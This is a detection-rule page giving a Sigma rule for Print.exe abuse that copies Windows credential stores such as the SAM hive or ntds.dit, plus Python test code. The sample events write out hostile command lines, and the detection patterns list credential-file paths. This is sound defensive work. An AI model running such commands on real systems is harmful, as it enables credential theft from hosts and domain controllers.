Sensitive File Dump Via Print.EXE
Detects abuse of the Print.exe utility for credential harvesting: Print.exe is invoked with its /D switch so that the "print" output is written to a file instead of a printer, which turns it into a file-copy primitive for sensitive files such as ntds.dit or the SAM, SECURITY and SYSTEM registry hives under the Windows directory. The copy can land locally or on a remote path, and the credentials are then extracted from it offline.
Sigma rule
title: Sensitive File Dump Via Print.EXE
id: 2fcda7e2-8c57-4904-86ac-37fc3157e09d
status: test
description: |
    Detects the abuse of the Print.exe utility for credential harvesting which involves using Print.Exe to copy sensitive files such as ntds.dit, SAM, SECURITY, or SYSTEM from the Windows directory in order to extract credentials, locally or remotely.
references:
    - https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/
    - https://www.huntress.com/blog/credential-theft-expanding-your-reach-pt-2
    - https://lolbas-project.github.io/lolbas/Binaries/Print/
author: Ayush Anand (Securityinbits)
date: 2026-04-28
tags:
    - attack.credential-access
    - attack.stealth
    - attack.t1003.003
    - attack.t1003.002
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\print.exe'
        - OriginalFileName: 'Print.EXE'
    selection_cli:
        CommandLine|contains|windash: '/D'
        CommandLine|contains:
            - '\config\SAM'
            - '\config\SECURITY'
            - '\config\SYSTEM'
            - '\windows\ntds\ntds.dit'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_print_dump_sensitive_files/info.yml
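To show what the rule above actually matches, here is an added Python re-implementation of its detection logic run over a handful of constructed process_creation events. This is example code written for this page, not SigmaHQ's matcher or the rule author's tests. It follows Sigma's default case-insensitive string matching; the `windash` modifier is assumed to expand `/D` to the `/` and `-` forms only (newer Sigma versions also accept Unicode dashes), and the events, hostnames and paths are invented.

```python
# Constructed sample process_creation events (invented, not real telemetry).
# Field names follow the Sysmon/Windows fields the Sigma rule uses.
SAMPLE_EVENTS = [
    {   # classic LOLBAS pattern: "print" the SAM hive to a remote share
        "Image": r"C:\Windows\System32\print.exe",
        "OriginalFileName": "Print.EXE",
        "CommandLine": r"print.exe /D:\\10.0.0.5\share\sam.hive C:\Windows\System32\config\SAM",
    },
    {   # dash-style switch and a domain controller's ntds.dit
        "Image": r"C:\Windows\System32\print.exe",
        "OriginalFileName": "Print.EXE",
        "CommandLine": r"print -d:C:\Users\Public\ntds.bak C:\Windows\NTDS\ntds.dit",
    },
    {   # renamed binary: Image misses, OriginalFileName (PE metadata) still catches it
        "Image": r"C:\Temp\p.exe",
        "OriginalFileName": "Print.EXE",
        "CommandLine": r"p.exe /D:C:\Temp\sys C:\Windows\System32\config\SYSTEM",
    },
    {   # benign use of print.exe: sends a report to a printer port
        "Image": r"C:\Windows\System32\print.exe",
        "OriginalFileName": "Print.EXE",
        "CommandLine": r"print /D:LPT1 C:\Users\bob\report.txt",
    },
    {   # hive path without print.exe: out of scope for this rule
        "Image": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": r"cmd /c copy C:\Windows\System32\config\SAM C:\Temp\SAM",
    },
]

# Values copied from the rule's selection_cli list.
SENSITIVE_PATHS = [
    r"\config\SAM",
    r"\config\SECURITY",
    r"\config\SYSTEM",
    r"\windows\ntds\ntds.dit",
]

# Assumption: windash expands the switch prefix to '/' and '-' only.
WINDASH_PREFIXES = ("/", "-")


def _ci(value: str) -> str:
    """Sigma string matching is case-insensitive by default."""
    return value.casefold()


def selection_img(event: dict) -> bool:
    """selection_img: a list of maps under one key means OR between the items."""
    image_hit = _ci(event.get("Image", "")).endswith(_ci(r"\print.exe"))
    ofn_hit = _ci(event.get("OriginalFileName", "")) == _ci("Print.EXE")
    return image_hit or ofn_hit


def selection_cli(event: dict) -> bool:
    """selection_cli: two keys in one map are ANDed; the path list is ORed."""
    cmdline = _ci(event.get("CommandLine", ""))
    has_redirect_switch = any(prefix + "d" in cmdline for prefix in WINDASH_PREFIXES)
    has_sensitive_path = any(_ci(path) in cmdline for path in SENSITIVE_PATHS)
    return has_redirect_switch and has_sensitive_path


def matches(event: dict) -> bool:
    """condition: all of selection_*"""
    return selection_img(event) and selection_cli(event)


def run(events: list) -> list:
    """Return the indexes of the events the rule fires on."""
    return [i for i, event in enumerate(events) if matches(event)]


if __name__ == "__main__":
    for i in run(SAMPLE_EVENTS):
        print(f"ALERT event {i}: {SAMPLE_EVENTS[i]['CommandLine']}")
```

Running it flags the first three events and leaves the printer-port and cmd.exe events alone. Two properties of the rule are worth noting when tuning it: the `OriginalFileName` branch is what keeps a renamed `print.exe` in scope, so do not drop it to reduce noise; and `contains|windash: '/D'` is a loose substring test, so any command line that happens to contain `-d` (for example a file name with a hyphen) satisfies that half of `selection_cli`. In practice that does not matter much, because the other half still requires one of the hive or ntds.dit paths, which is the part that makes the event suspicious.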
Related rules
- Hidden Flag Set On File/Directory Via Chflags - MacOS
- Insensitive Subfolder Search Via Findstr.EXE
- Remote File Download Via Findstr.EXE
- Time Travel Debugging Utility Usage
- Time Travel Debugging Utility Usage - Image